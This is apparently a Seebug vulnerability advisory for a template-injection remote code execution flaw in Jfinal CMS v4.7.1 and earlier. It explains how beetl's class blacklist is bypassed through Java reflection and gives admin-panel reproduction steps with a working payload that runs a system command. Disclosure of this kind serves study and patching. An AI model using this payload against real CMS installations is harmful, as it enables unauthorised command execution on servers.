Jfinal cms Background RCE

基本字段

漏洞编号：: SSV-97881

披露/发现时间：: 未知

提交时间：: 2019-03-29

漏洞等级：

漏洞类别：: 代码执行

影响组件：: Jfinal cms

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者匿名共获得 0KB

## Jfinal cms Background RCE ### Introduction to Vulnerability Jfinal cms, using the simple and powerful JFinal as the web framework, the template engine is beetl, the database uses mysql, front-end bootstrap, flat ui and other frameworks. Support multi-site, oauth2 authentication, account registration, password encryption, comments and replies, message prompts, website traffic statistics, article comments and pageview statistics, response management, rights management, etc. There is a command execution vulnerability in its background template management office. ### Vulnerability Impact - <= v4.7.1 ### Vulnerability Analysis The template engine is beetl, beetl can directly call the java method, although some restrictions have been made, but can be bypassed by the reflection of java. ```java Package org.beetl.core; Public class DefaultNativeSecurityManager implements NativeSecurityManager { Public DefaultNativeSecurityManager() { } Public boolean permit(String resourceId, Class c, Object target, String method) { If (c.isArray()) { Return true; } else { String name = c.getName(); String className = null; String pkgName = null; Int i = name.lastIndexOf(46); If (i == -1) { Return true; } else { pkgName = name.substring(0, i); className = name.substring(i + 1); Return !pkgName.startsWith("java.lang") || !className.equals("Runtime") && !className.equals("Process") && !className.equals("ProcessBuilder") && !className.equals(" System"); } } } } ``` ### Vulnerability recurrence 1. Login to the background 2. Click on Template Management Http://localhost:8080/jfinal_cms/admin/filemanager/list Feel free to find a template file to modify, here I am modifying the show_about.htm template as an example. Write the payload in the template file and save it. ``` ${@java.lang.Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc') ")} ``` ![](https://images.seebug.org/1553854670131-w331s) 3. Access the about page to trigger the payload Http://localhost:8080/jfinal_cms/front/about ![](https://images.seebug.org/1553854678521-w331s)

共 0 兑换了

PoC

暂无 PoC

参考链接

https://www.seebug.org/

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Jfinal cms Background RCE

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定